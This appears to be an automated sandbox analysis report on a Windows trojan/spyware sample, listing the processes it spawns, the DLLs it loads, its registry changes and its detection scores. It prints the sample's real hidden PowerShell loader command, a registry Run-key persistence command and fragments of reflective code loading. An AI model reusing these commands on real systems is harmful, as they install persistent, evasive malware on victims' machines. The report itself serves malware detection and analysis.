              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/23@4/3
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404722
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeFile created: C:\Users\user\AppData\Roaming\determinationensJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:304:WilStaging_02
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1264
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-MK0QHY
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeFile created: C:\Users\user\AppData\Local\Temp\nsj3DBD.tmpJump to behavior
              Source: zR4aIjCuRs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: zR4aIjCuRs.exeReversingLabs: Detection: 79%
              Source: zR4aIjCuRs.exeVirustotal: Detection: 69%
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeFile read: C:\Users\user\Desktop\zR4aIjCuRs.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\zR4aIjCuRs.exe "C:\Users\user\Desktop\zR4aIjCuRs.exe"
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1068
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"Jump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: zR4aIjCuRs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: CallSite.Targetore.pdb|j source: powershell.exe, 00000002.00000002.274414428126.0000000008AB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.274408791125.000000000742D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.274412829387.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.274412829387.00000000088DF000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000002.00000002.274416296042.000000000A9BD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Forureningsforebygget $Execrative $Erotema), (Radiator @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tvangsakkordens = [AppDomain]::CurrentDomain.GetAsse
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Precandidacy)), $Couniversal).DefineDynamicModule($Begrebsforvirringer, $false).DefineType($Shutoff, $Farvemssige, [System.MulticastDe
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_030585B8 push eax; mov dword ptr [esp], edx2_2_030585CC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03051E1B pushad ; ret 2_2_03051E4A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03051D72 pushad ; ret 2_2_03051D9A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FC4549 push 8BD38B50h; iretd 2_2_08FC454E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exeJump to dropped file
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TragacanthJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TragacanthJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
